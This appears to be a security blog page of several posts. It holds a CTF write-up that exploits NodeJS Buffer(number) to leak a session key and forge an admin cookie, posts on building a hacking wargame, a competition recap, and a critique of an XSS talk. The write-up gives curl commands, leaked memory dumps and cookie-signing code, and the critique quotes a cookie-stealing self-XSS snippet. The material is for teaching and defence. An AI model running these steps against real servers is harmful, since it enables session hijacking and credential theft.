NodeJS Hacking Challenge - writeup

Posted on Tue 26 January 2016 in posts • Tagged with ctf, nodejs

You can read the previous article on how to setup and access the NodeJS hacking challenge. I will now spoil the challenge, so if you want to try it yourself, stop reading now!

Scroll down for a TL;DR writeup.

1. getting an overview

index page

When we first access the page we find this nice landing page. I tried to make a lame joke, but also hint at the issue. Languages like C are very prone to memory corruption vulnerabilities, especially when an inexperienced programmer starts writing C code. That's why it's advised to choose "memory safe" languages for regular projects, or generally languages that make it harder to make mistakes. JavaScript is one of those safer languages. But the bug that will be exploited here shows that even in this very high-level language, you might not be as safe as you think you are.

In the menu we can see the items Home, Vexillology and Code. The latter is just a link to the source code.

index page

The /admin or private Vexillology area is protected by a big password prompt. When we enter a password we get told that the password is wrong.

index page

When we open the developer console from our browser, we can see that when we enter a password, a POST request to /login is performed with the password as JSON data {"password": "test"}.

Another thing we should pay attention to is the cookie. In fact there are two cookies: session=eyJhZG1pbiI6Im5vIn0= and session.sig=wwg0b0z2AQJ2GCyXHt53ONkIXRs. When you decode the base64 session cookie, you will see that it says {"admin":"no"}. Now you might think that we can simply set this to "yes". But this won't work, because the cookie is HMAC protected. If you change it, the signature no longer matches and the server will simply throw it away.
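If you want to check the decoding yourself, here is a minimal sketch. It assumes a reasonably recent Node.js where Buffer.from() is available, and it only uses the cookie value quoted above:

```javascript
// Decode the session cookie value from above: standard base64 wrapping a JSON string.
const cookieValue = 'eyJhZG1pbiI6Im5vIn0=';
const decoded = Buffer.from(cookieValue, 'base64').toString('utf8');
const session = JSON.parse(decoded);

console.log(decoded);       // {"admin":"no"}
console.log(session.admin); // no
```

Nothing here touches session.sig, which is why editing the decoded value alone is not enough.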

There is a good reason why you would want to store this information in a cookie with the client. This way you can have a stateless server application, and you can easily spin up new machines or do load-balancing without having to think about sharing a database with the session information.

2. code review

Now let's have a look at the source code. A good point to start is the app.js file. We can learn several things from it. First we can see that the app uses the express web framework (var express = require('express');). But this doesn't really matter too much here.

We can also have a look into the config.js file, which contains a dummy secret_password and dummy session_keys. Those keys are used to generate the HMAC for the cookies.

Next we should have a look at routes/index.js to see where our requests are handled. And it's really not much code.

router.get('/', function(req, res, next) {
    res.render('index', { title: 'index', admin: req.session.admin });
});

router.get('/admin', function(req, res, next) {
    res.render('admin', { title: 'Admin area', admin: req.session.admin, flag: config.secret_password });
});

router.get('/logout', function(req, res, next) {
    req.session = null;
    res.json({'status': 'ok'});
});

router.post('/login', function(req, res, next) {
    if(req.body.password !== undefined) {
        // the password comes straight from the JSON body and is passed to Buffer()
        var password = new Buffer(req.body.password);
        if(password.toString('base64') == config.secret_password) {
            req.session.admin = 'yes';
            res.json({'status': 'ok' });
        } else {
            res.json({'status': 'error', 'error': 'password wrong: '+password.toString() });
        }
    } else {
        res.json({'status': 'error', 'error': 'password missing' });
    }
});
You might notice that the secret_password is given as flag to the admin template. If you look at the template code in views/admin.jade you can see that if you were authenticated as an admin, you would get the secret_password.

if admin === 'yes'
    p You are admin #{flag}

The only function that seems to have a bit more functionality is /login. Login checks if a password is set. Then it creates a Buffer() from the password and converts the Buffer to a base64 string, which is then compared to the secret_password. If that comparison succeeds, the session sets admin = 'yes'.

3. the vuln

Somebody with a hacker mindset might immediately try to trace where untrusted user input is handled. And eventually you would come across the Buffer class. It turns out that Buffer() behaves differently depending on the type of its parameter. You can test this with NodeJS on the command line:

> Buffer('AAAA')
<Buffer 41 41 41 41>
> Buffer(4)
<Buffer 90 4e 80 01>
> Buffer(4)
<Buffer 50 cc 02 02>
> Buffer(4)
<Buffer 0a 00 00 00>

You can see that when Buffer is called with a string, it will create a Buffer containing those bytes. But if it's called with a number n, NodeJS will allocate a Buffer of n bytes. If you look closely, though, the buffer is not simply <Buffer 00 00 00 00>. It seems to contain different values every time. That is because Buffer(number) doesn't zero the memory, so it can leak data that previously lived on the heap.

This is the issue that recently surfaced. NodeJS issue #4660 discusses the issue and possible fixes. And yes, there were real-world packages affected.
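For comparison, later Node.js releases split the overloaded constructor into separate functions. The following is only a sketch of how those newer APIs behave, assuming a Node.js version that ships Buffer.from(), Buffer.alloc() and Buffer.allocUnsafe() (they did not exist in the version this challenge was written for):

```javascript
// Buffer.from() only accepts data (strings, arrays, other buffers), never a bare size.
const fromString = Buffer.from('AAAA');
console.log(fromString); // <Buffer 41 41 41 41>

// Buffer.alloc() always hands back zero-filled memory.
const zeroed = Buffer.alloc(4);
console.log(zeroed); // <Buffer 00 00 00 00>

// Buffer.allocUnsafe() is the explicit opt-in to uninitialized memory;
// its contents are unpredictable, so only the length is printed here.
const raw = Buffer.allocUnsafe(4);
console.log(raw.length); // 4

// A number passed to Buffer.from() is rejected instead of being treated as a size.
let rejected = false;
try {
  Buffer.from(100);
} catch (err) {
  rejected = err instanceof TypeError;
}
console.log(rejected); // true
```

With this split, the {"password": 100} request would raise an error instead of allocating 100 uninitialized bytes.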

So because we have a JSON middleware (app.use(bodyParser.json())), we can actually send POST data that contains a number instead of a string. And when you do that, the API will return some memory that is leaked from the heap:

curl -X POST -H "Content-Type: application/json" --data "{\"password\": 100}" | hexdump -C
00000000  7b 22 73 74 61 74 75 73  22 3a 22 65 72 72 6f 72  |{"status":"error|
00000010  22 2c 22 65 72 72 6f 72  22 3a 22 70 61 73 73 77  |","error":"passw|
00000020  6f 72 64 20 77 72 6f 6e  67 3a 20 69 73 41 72 72  |ord wrong: isArr|
00000030  61 79 2f ef bf bd 71 ef  bf bd 5c 75 30 30 30 30  |ay/...q...\u0000|
00000040  5c 75 30 30 30 30 5c 75  30 30 30 30 5c 75 30 30  |\u0000\u0000\u00|
00000050  30 30 5c 75 30 30 30 30  5c 75 30 30 31 30 ef bf  |00\u0000\u0010..|
00000060  bd 43 5c 75 30 30 30 33  5c 75 30 30 30 30 5c 75  |.C\u0003\u0000\u|
00000070  30 30 30 30 5c 75 30 30  30 30 5c 75 30 30 30 30  |0000\u0000\u0000|
00000080  5c 75 30 30 30 31 3c 2f  70 72 65 3e 3c ef bf bd  |\u0001</pre><...|
00000090  7f 43 5c 75 30 30 30 33  5c 75 30 30 30 30 5c 75  |.C\u0003\u0000\u|
000000a0  30 30 30 30 5c 75 30 30  30 30 5c 75 30 30 30 30  |0000\u0000\u0000|
000000b0  5c 75 30 30 30 37 5c 75  30 30 30 30 5c 75 30 30  |\u0007\u0000\u00|
000000c0  30 30 5c 75 30 30 30 30  2f 68 74 6d 5c 75 30 30  |00\u0000/htm\u00|
000000d0  30 32 5c 75 30 30 31 32  d0 a3 5c 75 30 30 30 30  |02\u0012..\u0000|
000000e0  5c 75 30 30 30 30 5c 75  30 30 30 30 5c 75 30 30  |\u0000\u0000\u00|
000000f0  30 30 5c 75 30 30 30 30  5c 75 30 30 30 30 5c 75  |00\u0000\u0000\u|
00000100  30 30 30 30 5c 75 30 30  30 30 76 65 5c 75 30 30  |0000\u0000ve\u00|
00000110  30 30 5c 75 30 30 30 30  ef bf bd 7f 43 5c 75 30  |00\u0000....C\u0|
00000120  30 30 33 5c 75 30 30 30  30 5c 75 30 30 30 30 5c  |003\u0000\u0000\|
00000130  75 30 30 30 30 5c 75 30  30 30 30 5c 75 30 30 30  |u0000\u0000\u000|
00000140  30 5c 75 30 30 30 30 5c  75 30 30 30 30 5c 75 30  |0\u0000\u0000\u0|
00000150  30 30 30 5c 75 30 30 30  30 5c 75 30 30 30 30 5c  |000\u0000\u0000\|
00000160  75 30 30 30 30 5c 75 30  30 30 30 ef bf bd ef bf  |u0000\u0000.....|
00000170  bd ef bf bd 5c 75 30 30  30 30 5c 75 30 30 30 30  |....\u0000\u0000|
00000180  5c 75 30 30 30 30 5c 75  30 30 30 30 5c 75 30 30  |\u0000\u0000\u00|
00000190  30 30 3a 5c 75 30 30 30  36 5c 75 30 30 30 30 5c  |00:\u0006\u0000\|
000001a0  75 30 30 30 30 ef bf bd  5c 75 30 30 30 30 5c 75  |u0000...\u0000\u|
000001b0  30 30 30 30 5c 75 30 30  30 30 50 32 31 5c 75 30  |0000\u0000P21\u0|
000001c0  30 30 33 22 7d                                    |003"}|

When you do this often enough, at some point you will leak one of the session_keys:

curl -X POST -H "Content-Type: application/json" --data "{\"password\": 100}" | hexdump -C
00000000  7b 22 73 74 61 74 75 73  22 3a 22 65 72 72 6f 72  |{"status":"error|
00000010  22 2c 22 65 72 72 6f 72  22 3a 22 70 61 73 73 77  |","error":"passw|
00000020  6f 72 64 20 77 72 6f 6e  67 3a 20 41 4c 4c 45 53  |ord wrong: ALLES|
00000030  7b 73 65 73 73 69 6f 6e  5f 6b 65 79 5f 4b 2e 47  |{session_key_K.G|
00000040  4b 51 65 52 30 4a 53 32  62 39 4f 68 77 53 48 23  |KQeR0JS2b9OhwSH#|
00000050  55 64 4d 68 4c 34 45 64  64 78 65 44 3f 7d 72 64  |UdMhL4EddxeD?}rd|
00000060  41 70 70 7b 5c 22 61 64  6d 69 6e 5c 22 3a 5c 22  |App{\"admin\":\"|
00000070  6e 6f 5c 22 7d 3e 69 3c  21 44 4f 43 54 59 50 45  |no\"}>i<!DOCTYPE|
00000080  20 68 74 6d 6c 3e 3c 68  74 6d 6c 20 6e 67 2d 61  | html><html ng-a|
00000090  70 70 3d 22 7d                                    |pp="}|
curl -X POST -H "Content-Type: application/json" --data "{\"password\": 100}" | grep ALLES
{"status":"error","error":"password wrong: ALLES{session_key_K.GKQeR0JS2b9OhwSH#UdMhL4EddxeD?}><lin{\"admin\":\"no\"}eet\" href=\"/stylesheets/style."}

Leaked session key: ALLES{session_key_K.GKQeR0JS2b9OhwSH#UdMhL4EddxeD?}
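Instead of eyeballing hexdumps, you can scan each response for the ALLES{...} format. This is a small sketch; findFlag and the sample string are illustrative (the sample is shortened from the response above), and sending the actual requests in a loop is left out:

```javascript
// Matches the flag/key format used by the challenge: ALLES{...}
const FLAG_PATTERN = /ALLES\{[^}]*\}/;

// Returns the first ALLES{...} token found in a response body, or null.
function findFlag(body) {
  const match = FLAG_PATTERN.exec(body);
  return match ? match[0] : null;
}

// Shortened copy of the leaking response shown above.
const sample = '{"status":"error","error":"password wrong: ' +
  'ALLES{session_key_K.GKQeR0JS2b9OhwSH#UdMhL4EddxeD?}><lin"}';

console.log(findFlag(sample));
console.log(findFlag('{"status":"error","error":"password wrong: isArray"}')); // null
```

Calling findFlag on every response and stopping at the first non-null result automates the "do this often enough" part.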

Why can the session key be leaked here? And why can I not leak the secret password? I only have an assumption for the latter: the hardcoded password probably lives in a memory area that is mapped when the JIT compiler takes care of the JS code, while the memory allocated by Buffer() is somewhere else.

The NodeJS app uses cookie-session (var session = require('cookie-session')), which depends on cookies, which in turn depends on keygrip. keygrip creates the HMAC signature using the node core crypto package, and crypto creates a Buffer from the key. This means that an old session key could be leaked from memory.

With this session key we can now simply create a {"admin": "yes"} cookie with a valid signature, which gives us access to the private area. You can do that by taking the source code of this app, changing the session key in config.js to the leaked one and setting the default cookie to req.session.admin = 'yes' in app.js.

Then you can grab the values from your modified local application, and simply set those cookies for the challenge server: session=eyJhZG1pbiI6InllcyJ9 and session.sig=oom6DtiV8CPOxVRSW3IFtE909As.
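If you don't want to run a modified copy of the app, the signing step can also be sketched by hand. This assumes that keygrip signs with HMAC-SHA1 and URL-safe base64 without padding, and that cookies signs the string name=value; that matches my reading of those libraries, but check the versions you actually use. signCookie, forgeSession and the dummy key are names made up for this example:

```javascript
const crypto = require('crypto');

// Sign "name=value" with HMAC-SHA1 and return URL-safe base64 without padding.
// Assumption: this mirrors the keygrip/cookies behaviour, it is not copied from them.
function signCookie(name, value, key) {
  return crypto.createHmac('sha1', key)
    .update(name + '=' + value)
    .digest('base64')
    .replace(/\+/g, '-')
    .replace(/\//g, '_')
    .replace(/=+$/, '');
}

// Build the cookie pair for a given session payload.
function forgeSession(payload, key) {
  const value = Buffer.from(JSON.stringify(payload)).toString('base64');
  return { 'session': value, 'session.sig': signCookie('session', value, key) };
}

// Dummy key for local testing; on the real server you would use the leaked key.
const forged = forgeSession({ admin: 'yes' }, 'ALLES{dummy_key_for_local_testing}');
console.log(forged['session']); // eyJhZG1pbiI6InllcyJ9
console.log(forged['session.sig'].length); // 27
```

The session value matches the one above. The signature depends on the key, so it is only valid for the server whose key you used.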

admin access

And now we can decode the base64 flag, which is our secret_password:


TLDR: send a number as password to get a memory leak from NodeJS Buffer(number). POST /login {"password": 1000}. With a couple of tries you should leak the session key, which can be used to create a new valid signed cookie with {"admin": "yes"}. Win!

Fun Fact: this application is probably also vulnerable to a timing attack: password.toString('base64') == config.secret_password
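A hardened password check could look roughly like this. It is a sketch, not the fix that was applied anywhere: it assumes a Node.js version with Buffer.from() and crypto.timingSafeEqual(), and isCorrectPassword is a hypothetical helper name. It rejects non-string input (which closes the Buffer(number) leak) and compares fixed-length hashes in constant time (which addresses the timing issue):

```javascript
const crypto = require('crypto');

// Returns true only if `input` is a string whose base64 form equals the secret.
function isCorrectPassword(input, secretBase64) {
  // Reject numbers, arrays, objects: only strings may reach Buffer.from().
  if (typeof input !== 'string') {
    return false;
  }
  const candidate = Buffer.from(input, 'utf8').toString('base64');

  // Hash both sides so the buffers have equal length, as timingSafeEqual requires.
  const a = crypto.createHash('sha256').update(candidate).digest();
  const b = crypto.createHash('sha256').update(secretBase64).digest();
  return crypto.timingSafeEqual(a, b);
}

// Example with a made-up secret.
const secret = Buffer.from('hunter2').toString('base64');
console.log(isCorrectPassword('hunter2', secret)); // true
console.log(isCorrectPassword(100, secret));       // false
```

The error response should also stop echoing the submitted password back to the client.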

NodeJS Hacking Challenge

Posted on Fri 22 January 2016 in posts • Tagged with ctf, nodejs

I really like to play CTFs (hacking games), because I always learn something new. But sometimes it's also fun to create a challenge yourself. A couple of days ago a nice NodeJS issue surfaced on my twitter feed and because I didn't have a lot of experience with NodeJS, I thought it would be a cool idea to learn more about it, by creating a challenge around it.

At the time of writing this blog post, I still host the challenge on a disposable VM at The source code is available for download here. This website has a restricted area /admin that requires a password to login.

The goal is to successfully gain access to the restricted area and find the secret_password. The source code contains a dummy password and keys, which are obviously different on the actual challenge server. But they are easily identifiable because they follow the same format ALLES{...}. So you know when you got it.

If you stumble across this post at some point in the future and my VM is probably not running anymore, you can just host it locally. Make sure you have NodeJS and npm installed. In case something changes in the future, I am running the following versions:

$ cd nodejs_chall
$ node -v
$ npm -v
$ npm install # install dependencies
$ npm start # start server on

If you want to give it a try yourself, you should stop reading now!

If you already tried everything (ALLES!), but you couldn't find the issue, read the follow-up article.

Creating a Hacking Game - Part 2: The System

Posted on Sun 09 August 2015 in posts • Tagged with ctf, gracker

For an introduction to my hacking game, check out: Creating a Hacking Game - Part 1: Introduction

Creating this system was an interesting challenge - the main threat vector is root exploits. I'm not a sysadmin and my Linux knowledge is not very in-depth. But I'm still pretty confident in my design. So now I want to go over every design decision.

> The whole setup is currently running on a very cheap vServer running a 64bit Debian

I got a cheap vServer because I didn't want to pay a lot of money for something nobody will use. And I chose Debian because that's the OS I'm most familiar with on a Server. But the distro shouldn't really matter as you will see soon.

> Chroot Jail for the game:

I wanted to separate the game from the real system and chroot seemed like a very good choice to handcraft the system. This can be easily done with sshd:

Match User level*
    PasswordAuthentication yes
    ChrootDirectory /var/sshjail/

This means that all players will chroot to /var/sshjail and they should only be able to access the files inside that folder. So the whole system may look like this:


But when the level0 player is logged in ls / will only list:


This allows me to handcraft the filesystem used by the players and limit the attack surface.

> No access to potentially dangerous stuff like /proc and setuid binaries:

Being able to set up the filesystem how I want, I can choose to not mount /proc or /dev. There is no reason why a user should have access to /proc/kallsyms and know where kernel symbols are. I pulled up a random root exploit on the ExploitDatabase and it relies on access to /proc.

It's a lot of work to copy all the files necessary for a Linux system into the chroot jail. I need to copy every binary, including the shell itself and ls, cd, ... . But not only that, all the libraries like libc have to be copied as well. But this allows me to carefully control which binaries users have access to and exclude any setuid root binaries. setuid binaries are another way a root exploit could be achieved - so better remove those.

> Use Linux file attributes to prevent players from modifying or deleting files, even though they are the owner of them:

The game relies on setuid binaries for levels. So for example you exploit the /matrix/level1/level1 binary that belongs to user level2, so that when you exploit it, you have the rights of level2. But when you login as level2 you should not be able to delete or modify that binary - that would destroy the game. You should also not be able to create files anywhere, even in your home folder. That's why I use Linux file attributes to control this.

Here is level1 as an example. The owner of the level1 binary is user level2 but the group is still level1. Together with the setuid bit s, this means the user level1 can execute the binary, but it will run as level2. Additionally the immutable file attribute i is set so that even the owner level2 cannot modify it.

$ ls -l /matrix/level1
total 12
-r-sr-x--- 1 level2 level1 level1
$ lsattr ./matrix/level1
----i--------e-- ./matrix/level1/level1
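To make the permission string from ls -l a bit easier to read, here is a small sketch that converts it to the octal mode you would pass to chmod. modeToOctal is a hypothetical helper written for this post, not part of the game setup:

```javascript
// Convert an `ls -l` style mode string (e.g. "-r-sr-x---") into octal notation.
function modeToOctal(mode) {
  const perms = mode.slice(1); // drop the leading file type character
  const digits = [0, 0, 0];    // owner, group, others
  let special = 0;             // setuid (4), setgid (2), sticky (1)

  for (let i = 0; i < 9; i++) {
    const ch = perms[i];
    const who = Math.floor(i / 3);
    const pos = i % 3;
    if (ch === '-') continue;
    if (pos === 0) {
      digits[who] += 4; // read
    } else if (pos === 1) {
      digits[who] += 2; // write
    } else {
      // lowercase s/t means "special bit and execute", uppercase means special bit only
      if (ch === 'x' || ch === 's' || ch === 't') digits[who] += 1;
      if (ch === 's' || ch === 'S') special += (who === 0 ? 4 : 2);
      if (ch === 't' || ch === 'T') special += 1;
    }
  }
  return String(special) + digits.join('');
}

console.log(modeToOctal('-r-sr-x---')); // 4550
console.log(modeToOctal('-rw-r-----')); // 0640
```

So the level binary is mode 4550: setuid, readable and executable for owner level2 and group level1, and nothing for everybody else.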

Same goes for the files in the home folder of the user. They all belong to level1 but they are immutable. You may notice that the iwashere file has the write permission for the level1 owner and that the file attribute is append only a. This allows the user to add a line to the file with for example echo "samuirai was here" >> /home/level1/iwashere but the user cannot delete or overwrite it.

$ ls -l /home/level1/*
-rw-r----- 1 level1 level1 /home/level1/iwashere
-r--r----- 1 level1 level1 /home/level1/recap
-r--r----- 1 level1 level1 /home/level1/story
-r--r----- 1 level1 level1 /home/level1/welcome
$ lsattr /home/level1/*
-----a-------e-- /home/level1/iwashere
----i--------e-- /home/level1/recap
----i--------e-- /home/level1/story
----i--------e-- /home/level1/welcome

> iptables firewall rules to stop users from abusing the server:

I use fail2ban against ssh password bruteforcing. And I block all outgoing connections from the players, so that the server cannot be abused for DoS attacks.

Chain OUTPUT (policy ACCEPT)
target  prot  opt  source    destination
REJECT  all   --   anywhere  anywhere     owner UID match level0 reject-with icmp-port-unreachable
REJECT  all   --   anywhere  anywhere     owner UID match level1 reject-with icmp-port-unreachable

> Set user limits:

I mainly just copied the values from, because I have no idea what good values are. For example the limit of 40 -u processes prevents fork bombs.

[email protected]:~$ ulimit -a
-t: cpu time (seconds)              unlimited
-f: file size (blocks)              unlimited
-d: data seg size (kbytes)          unlimited
-s: stack size (kbytes)             8192
-c: core file size (blocks)         0
-m: resident set size (kbytes)      100000
-u: processes                       40
-n: file descriptors                1024
-l: locked-in-memory size (kbytes)  64
-v: address space (kbytes)          2000000
-x: file locks                      unlimited
-i: pending signals                 7976
-q: bytes in POSIX msg queues       819200

> Remaining threats:

One issue will always be root exploits like the recent CVE-2015-3290. But I hope the restricted filesystem together with the virtualized vServer will protect me from the majority.

The other big issue is race conditions when setting up new levels or making changes to current levels. When I make changes to levels I cannot make these atomic. I have to remove the immutable attribute, modify a file and re-add the attribute. There is a window of opportunity where an attacker could make a mess. But this can be avoided by blocking ssh access, killing all processes from players, making the changes and then allowing them back in.

Creating a Hacking Game - Part 1: Introduction

Posted on Sat 08 August 2015 in posts • Tagged with ctf, gracker

This is a multi-part blog post about creating my own hacking game to teach other people the excitement of exploiting vulnerabilities. To try it out, just connect to ssh [email protected] with password level0. You only need a little bit of Linux command line knowledge. And get used to googling a lot ;)

$ ssh [email protected]
      __                  _
     / /                 | |
    / /_ _ _ __ __ _  ___| | _____ _ __
   / / _` | '__/ _` |/ __| |/ / _ \ '__|
  / / (_| | | | (_| | (__|   <  __/ |
 /_/ \__, |_|  \__,_|\___|_|\_\___|_|
      __/ |
             ~ follow the white rabbit ~
                     ~ gracker ~
            ~  #gracker ~
[email protected]'s password: level0

On Linux or Mac just open a terminal and type that command in. If you are on Windows you can use PuTTY.


In 2012 I came across Capture the Flag by stripe. At that point I knew a little bit of assembler - I had a rough idea of how the stack works and I kinda knew what a buffer overflow is. But I had never seen or exploited one myself. The CTF hooked me and I was so eager to solve those challenges. With a lot of time and googling I was able to solve the levels and got a T-Shirt that I wear proudly to this day. As stripe's blog post mentions, they were inspired by So I moved on to io and to this day I haven't finished all the levels. I believe I'm stuck on level 17 - but I always come back to it and realize that I learned more and can solve the next level.

So over time I have played some other CTFs - as you can see from my HITCON CTF 2014 sha1lcode writeup


I have this character flaw, that I get super obsessed with stuff. And I can never understand why other people are not interested in something I'm so enthusiastic about. So I guess in an attempt to get more people into this field that gives me so much excitement I wanted to create my own game - a game that is dedicated to beginners with a slow skill curve, so they don't get frustrated too quickly (though, that is part of the fun).

For an overview on how the game works, here is the README that you can access when you login as level0:

[email protected]:~$ cat README

│ How it works...                                                           │
│ This is a hacking game. The goal is to hack from level to level.         │
│                                                                          │
│ You are currently level0. The password of your current level can be      │
│ found in ~/.pass                                                         │
│    + run `id` to display your current user id                            │
│    + display your current password `cat /home/level0/.pass`              │
│                                                                          │
│ So your goal is to find the password for the next level (level1). With   │
│ the password you can then connect to the next level                      │
│    + `ssh [email protected]` to login with the found password           │
│                                                                          │
│ The level relevant files can be found under /matrix                      │
│    + display the files for level0 `ls /matrix/level0/`                   │
│                                                                          │
│ A good point to start is to read the "story" in your home folder. It     │
│ will give some motivation for the current level, it will tell you what   │
│ files are necessary and maybe give additional info.                      │
│    + display current story `cat ~/story`                                 │
│                                                                          │
│ Sometimes there is a story recap available, which contains additional    │
│ information about the challenge that you just solved. Usually this means │
│ you will discover new tools or techniques how to solve a challenge. If   │
│ you have a particular nice solution that you would like to share,        │
│ contact me, and I might add it.                                          │
│    + display the demo recap `cat ~/recap`                                │
│    + the recap for level0 is in `cat /home/level1/recap`                 │
│       (you need to get access to level1 before you can read it)          │
│                                                                          │
│ To show people that you made it to a particular level, you can add your  │
│ nickname, messages and secrets to the "iwashere" file. You can only read │
│ and append something to the file.                                        │
│    + show the world that you found this game:                            │
│      `echo "I made this. ~samuirai" >> ~/iwashere`                       │
│    + look at who was in level0 `less ~/iwashere` or `cat ~/iwashere`     │
│                                                                          │
│ Most important point. Have fun. The worst thing that can happen is, that │
│ you accidentally learn something.                                        │
│ Rules and System Info                                                     │
│   1. Do not DoS this or any other system. Don't be a kiddy!              │
│   2. Do not connect to remote systems from this.                         │
│   3. Do not use too many resources. This is a very small server.         │
│   4. Do not spoil challenges (no writeups!), but helping newbs good.     │
│   5. Be excellent.                                                       │
│   - levels can be found under /matrix                                    │
│   - You can only write to /tmp.                                          │
│   - Unused files and folders in /tmp are deleted after a few hours.      │
│   - If you want to have a specific tool installed, contact me.           │
│   - If you find bugs, please contact me.                                 │
│ Start                                                                     │
│ 1. read the story for your current level                                 │
│     `less ~/story`                                                       │
│ 2. find the files in `ls /matrix/level0`                                 │
│ 3. create a working directory in /tmp to develop scripts and tools       │
│ 4. solve the challenge and get the password                              │
│ 5. login as level1                                                       │
│ 6. read the recap for this level                                         │
│     `cat ~/recap`                                                        │
│ 7. read the story for level1 and solve the next challenge                │

Continue to Part 2: Creating a Hacking Game - Part 2: The System

Cyber Security Challenge Germany 2014

Posted on Sat 14 February 2015 in posts • Tagged with ctf, cscg

This is about my experience of the Cyber Security Challenge Germany 2014.

The Cyber Security Challenge Germany is a Capture The Flag style competition for students which I participated in. It is mainly organised by the Internet Sicherheit Institut (ger.: Internet Security Institution) and Compass Security with support from many companies as well as the German Federal Ministry for Economic Affairs and Energy.

It all started in November 2014 with an online qualification on, where we had to solve different challenges and collect points. The challenges were different from the typical CTF jeopardy style where you only have to find a flag. At hacking-lab you always have to write a report which will be reviewed by people. Also due to the fact that it was not only intended for experienced university students, but also for much younger highschool students (<18 y/o), many of the challenges were not that difficult - in the end all qualified uni students had solved all challenges. I'm also quite resentful that there was not a single pwning (binary exploitation) challenge, that the only reverse engineering challenge was a very simple XOR encryption, and that we had FOUR captcha breaking challenges :P But it was fun nonetheless.


Once the deadline was over, the 20 best students were invited to Berlin to participate in a live hacking competition in the beginning of February 2015. We got divided randomly into 4 teams with 5 people per team: two university student (Studenten) teams and two highschool student (Schüler) teams. I got very lucky with my team, because we complemented each other very well. easysurfer for example has a lot of experience with reversing on Windows and he was able to solve a mean challenge really fast, and EPG, who has experience with patching Java byte code in Android apps, solved a game hacking task super fast. So we were able to solve a lot of tasks pretty quickly.

In my opinion the challenges for the live hacking competition were a lot more fun than the ones from the qualification round. Especially because we had a bunch of very cool reversing challenges. Unfortunately I can't do any writeups, because the challenges may get reused for other events :(

Here is a picture from our Team Orange in the middle of the competition:

team orange

Once a team solved a challenge and got awarded the points, the other teams had only 1h left to solve it. When the deadline passed, the other teams had to give up those points and move to another challenge - so it was quite strategic where you spent your time. Because we were so quick with some of the tasks, we were able to establish quite a lead :P

When I talked to the students who participated, many of them actually hadn't done much, or anything at all, regarding hacking before. So this event motivated many of them to look into security and discover a new passion - which is pretty awesome.

In the end our Team Orange won the Cyber Security Challenge Germany 2014 and we each got a new ThinkPad T440p - which I gave to my significant other, because she always supports me and she has to tolerate those hours over hours I neglect her to pursue my dreams. Thank you!

Criticism - Revisiting XSS Sanitization

Posted on Sat 18 October 2014 in posts • Tagged with xss, security, bheu, criticism

This is a criticism about Ashar Javed's BlackHat EU Talk: Revisiting XSS Sanitization.

I believe that, as in any field of science, we need to have a discussion about published research. Especially when we think there is something wrong with the "experiments" and the resulting conclusion. Maybe I'm completely overlooking something, but at this point I don't even understand how this talk got accepted to a renowned conference like Black Hat.

First I want to give a quick summary of what Ashar Javed claims. Then I want to talk about what I thought is the consensus of the security community regarding XSS. And at the end I want to evaluate his conclusion/solution. Unfortunately I haven't seen his talk, so I can only read his paper and guess what he said during those 168 slides.

sha1lcode calltree

Research Summary

Basically he claims that he found Cross-site Scripting exploits in the top 25 online WYSIWYG editors with.

But what exactly did he exploit? He says,

The third-party WYSIWYG editors are normally available in the form of client-side JavaScript library, PHP or ASP based sever-side component and Rails gem.

So we already have multiple components - the client-side editor and sometimes a server side script that handles the input. And he is not clear about what component he exploited.

This is an example data flow. A user creates a post using a WYSIWYG editor, sends the post to the server where it gets stored in a database. And when another user wants to read the post, the server purifies/encodes the post properly, so it can be safely rendered in the user's browser: sha1lcode calltree

Let's go over each possible exploitation scenario:

1. Exploiting the Javascript Editor

1.1 Edit/Quoting Functionality

Let's assume there is a sanitized, completely safe, forum post like this:

sha1lcode calltree

But when another user wants to [Quote] your post, the string is automatically copied into their WYSIWYG editor. If the editor then executes the javascript, we have a minor XSS issue.

Is this one of his attacks? I'm not sure.

1.2 Self-XSS

Self-xss means a user gets tricked into hacking himself. This works against unsuspecting people and is for example an issue for Facebook - I could tell a 14 y/o kid that he can get free FarmVille credits when he presses F12 to access the "cheat console" (Developer Toolbar: F12, cmd+opt+I), and pastes this snippet:

new Image().src=""+encodeURI(document.cookie);

Of course the developer console is very obvious. So with a WYSIWYG editor you can maybe exploit some functionality that causes javascript to be executed. For example if I can enter javascript:alert(1) as a URL and it gets rendered (e.g. in the Preview) as <a href="javascript:alert(1)">link</a>, I can trick a user into executing that.

[!] Note: this is only on the current page, we haven't saved our text to the server - and we don't know yet what the real output looks like. It's possible that the output is properly sanitized/purified when we submit this link as a post. This means I can trick somebody into a self-xss if I can make them follow those steps.

Compare it to the original data flow. This XSS never leaves the first user:


And I believe that most of Ashar Javed's XSS are exactly this. For example his tinymce writeup sounds exactly like that (click on the image to go to his original post):

tinymce xss

Yes, it can become a problem (see Facebook), but in general I consider it a very, very minor issue. Not even worth reporting.
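For completeness, an editor preview that wants to avoid the javascript: link case could allowlist URL schemes before rendering a link. This is a minimal sketch under the assumption that the runtime provides the WHATWG URL class (modern browsers and Node.js do); isSafeLinkUrl is a hypothetical helper and not taken from any of the editors discussed here:

```javascript
// Only absolute http(s) links are allowed in this sketch.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Returns true if `value` parses as an absolute URL with an allowed scheme.
function isSafeLinkUrl(value) {
  let parsed;
  try {
    parsed = new URL(value);
  } catch (err) {
    return false; // not an absolute URL at all
  }
  // The parser normalizes the scheme to lowercase, so "JaVaScRiPt:" is caught too.
  return ALLOWED_PROTOCOLS.has(parsed.protocol);
}

console.log(isSafeLinkUrl('https://example.com/')); // true
console.log(isSafeLinkUrl('javascript:alert(1)'));  // false
console.log(isSafeLinkUrl('JaVaScRiPt:alert(1)'));  // false
```

An allowlist is used on purpose: a blocklist of "bad" schemes tends to miss variants.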

2. Exploiting the server-side script

This time we have the full flow and we store the post on the Server. But it doesn't get properly purified/encoded/sanitized for rendering in the user's browser.

server xss

2.1 Output not properly sanitized

Here is a perfect example by @StackSmashing. Protonmail uses a WYSIWYG editor (but this fact doesn't really matter). @StackSmashing just edits the HTML code generated by the editor and sends it to the server. Instead of being properly sanitized, the code gets embedded in an email and is then executed.

[!] Note: this works with any WYSIWYG editor when the output is not sanitized. Actually, it's wrong to say that this is an issue of the editor, because whatever the editor may disallow/purify/encode/sanitize, an attacker can always send whatever he wants to the server. The output needs to be safe.

2.2 BB-Code parser

Here is where stuff actually becomes very interesting and fun :3

